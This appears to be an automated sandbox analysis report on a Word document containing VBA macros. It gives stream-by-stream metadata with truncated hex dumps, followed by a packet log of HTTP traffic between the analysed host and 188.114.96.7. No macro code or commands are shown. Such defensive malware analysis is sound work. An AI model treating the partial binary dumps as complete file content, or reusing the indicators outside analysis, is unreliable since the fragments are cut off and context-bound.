Data Raw:	22 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 02 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: dBase III DBT, version number 0, next free block index 6967, 1st item "\345\356\277\223\227\277\223\251\277\223\273\277\260\251\257\277\330\241\265\322\242\265\322\277\260\315\277\312\273\274\313\337\275\313\337\257\300\331\277\312\335\277\312\356\277\312\377\277\377\335\277\377\377\277\345\377\337\260\251\337\312\273\312\325\345\313\326\346\327\340\354\337\377\377\337\345\377\337\377\356\337\345\356\330\340\354\377\312\273\377\312\315\377\377\335\377\345\315\377\345\335\345\352\362\362\365\371\377\377\356\377\345\356\345\353\362\363\365\371\377\377\377\244\320\037\237", Stream Size: 6967

General
Stream Path:	Data
File Type:	dBase III DBT, version number 0, next free block index 6967, 1st item "\345\356\277\223\227\277\223\251\277\223\273\277\260\251\257\277\330\241\265\322\242\265\322\277\260\315\277\312\273\274\313\337\275\313\337\257\300\331\277\312\335\277\312\356\277\312\377\277\377\335\277\377\377\277\345\377\337\260\251\337\312\273\312\325\345\313\326\346\327\340\354\337\377\377\337\345\377\337\377\356\337\345\356\330\340\354\377\312\273\377\312\315\377\377\335\377\345\315\377\345\335\345\352\362\362\365\371\377\377\356\377\345\356\345\353\362\363\365\371\377\377\377\244\320\037\237"
Stream Size:	6967
Entropy:	7.854695648652408
Base64 Encoded:	True
Data ASCII:	7 . . . D . d . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C . . b . . . . A . . . . . J . . . . . . . . . . . . . . 4 . c . 9 . 2 . 6 . 9 . c . b . - . 0 . 1 . 4 . 5 . - . 4 . 5 . 6 . 1 . - . a . 7 . c . 2 . - . 0 . 5 . 8 . 7 . 2 . b . 8 . 3 . 6 . 7 . 4 . 0 . . . . . . . . . . . . . b . . ] . . . . . 5 F ` E x < F } . 9 . . . . . . . D . . . . . @ . n . 1 . . . 5 F ` E x < F } P N G . . . . . . . .
Data Raw:	37 1b 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 30 87 0f ef 02 ef 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 86 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 62 00 00 00 04 41 01 00 00 00 05 c1 4a 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 34 00 63 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 363

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	363
Entropy:	5.349255188934172
Base64 Encoded:	True
Data ASCII:	I D = " { 9 7 2 3 0 C D C - 5 B D 9 - 4 0 8 F - B 7 7 0 - 1 6 9 A 5 5 B 2 E A 9 D } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 8 2 A D B 1 9 D F 1 9 D F 1 9 D F 1 9 D F " . . D P B = " 5 0 5 2 A 3 4 4 A 4 4 4 A 4 4 4 " . . G C = " 7 8 7 A 8 B 6 C 8 C 6 C 8 C 9 3 " . . . . [ H o s t E x t e n d e r I n f o ] . . & H 0 0 0 0 0 0
Data Raw:	49 44 3d 22 7b 39 37 32 33 30 43 44 43 2d 35 42 44 39 2d 34 30 38 46 2d 42 37 37 30 2d 31 36 39 41 35 35 42 32 45 41 39 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	41
Entropy:	3.0773844850752607
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2701

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	2701
Entropy:	4.333167536858213
Base64 Encoded:	False
Data ASCII:	a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
Data Raw:	cc 61 b5 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 2375

General
Stream Path:	Macros/VBA/__SRP_0
File Type:	data
Stream Size:	2375
Entropy:	3.530524644311823
Base64 Encoded:	False
Data ASCII:	K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ J . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . { S 0 g A . . . ) . . . . . . . .
Data Raw:	93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 40 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00

Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 174

General
Stream Path:	Macros/VBA/__SRP_1
File Type:	data
Stream Size:	174
Entropy:	1.5961252338289216
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 06 00 00 00 00 00 00 09 11 04 00 00 00 00

Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 1510

General
Stream Path:	Macros/VBA/__SRP_2
File Type:	data
Stream Size:	1510
Entropy:	3.3288304223061993
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 .
Data Raw:	72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 16 00 00 00 d1 0a 00 00 00 00 00 00 00 00 00 00 51 10 00 00 00 00 00 00 00 00 00 00 e1 08 00 00 00 00 00 00 00 00

Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 162

General
Stream Path:	Macros/VBA/__SRP_3
File Type:	data
Stream Size:	162
Entropy:	1.7994735431029083
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . ` . . . 8 . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 00 00 20 0e 38 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 514

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	514
Entropy:	6.268113025246675
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . . } f . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * . \\ C . . . . z f . . . ! O f f i c . g O . f . i . c . g
Data Raw:	01 fe b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 7f b6 7d 66 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: WordDocument, File Type: data, Stream Size: 4096

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	4096
Entropy:	1.0363797629535205
Base64 Encoded:	False
Data ASCII:	. G . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . i . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . J . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 47 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a dc c6 dc c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 be ac 19 69 be ac 19 69 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 31, 2023 17:08:22.904721022 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.921739101 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.921874046 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.922101021 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.938452005 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.951797962 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.951834917 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.951853037 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.951865911 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.951879025 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.951900005 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.951920033 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.951941967 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.951967001 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.951967001 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.951967001 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.951989889 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.952004910 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.952004910 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.952028036 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.952649117 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.952671051 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.952706099 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.952718973 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.952740908 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.952759981 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.952780008 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.952785969 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.952800035 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.952815056 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.953620911 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.953649044 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.953670025 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.953672886 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.953682899 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.953695059 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.953710079 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.953718901 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.953727007 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.953756094 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.954622030 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.954649925 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.954668045 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.954688072 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.954691887 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.954704046 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.954714060 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.954722881 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.954752922 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.955573082 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.955601931 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.955622911 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.955629110 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.955646992 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.955646992 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.955662012 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.955670118 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.955679893 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.955707073 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.956473112 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.968656063 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.968683958 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.968703032 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.968722105 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.968739986 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.968782902 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.969058037 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.969078064 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.969090939 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.969101906 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.969103098 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.969120979 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.969126940 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.969136000 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.969150066 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.969165087 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.969180107 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.970031023 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.970052004 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.970069885 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.970086098 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.970093966 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.970103025 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.970114946 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.970129967 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.970146894 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.970957041 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.970983982 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.971002102 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.971025944 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.971025944 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.971039057 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.971050024 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.971057892 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.971086979 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.971936941 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.971961975 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.971981049 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.971996069 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.972004890 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.972013950 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.972022057 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.972028971 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.972037077 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.972067118 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.972953081 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.972974062 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.972992897 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.973016024 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.973021030 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.973052025 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.973052025 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.973675013 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.973705053 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.973728895 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.973730087 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.973743916 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.973750114 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.973769903 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.973793030 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.973810911 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.974666119 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.974694967 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.974747896 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.974769115 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.974839926 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.974858999 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.974883080 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.974883080 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.974894047 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.974905968 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.974910975 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.974926949 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.974946976 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.974961996 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.975758076 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.975788116 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.975810051 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.975817919 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.975840092 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.975840092 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.975843906 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.975864887 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.975883961 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.975897074 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.976782084 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.976802111 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.976823092 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.976835966 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.976846933 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.976854086 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.976861000 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.976871014 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.976878881 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.976910114 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.985240936 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.985276937 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.985301018 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.985346079 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.985384941 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.985424042 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.985424042 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.985652924 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.985686064 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.985717058 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.985718966 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.985745907 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.985747099 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.985758066 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.985774040 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.985793114 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.985821009 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.986509085 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.986527920 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.986583948 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.987238884 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.987271070 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.987297058 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.987303972 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.987323999 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.987328053 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.987334967 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.987354994 CEST	80	49183	188.114.96.7	192.168.2.22
May 31, 2023 17:08:22.987370014 CEST	49183	80	192.168.2.22	188.114.96.7
May 31, 2023 17:08:22.987386942 CEST	49183	80	192.168.2.22	188.114.96.7
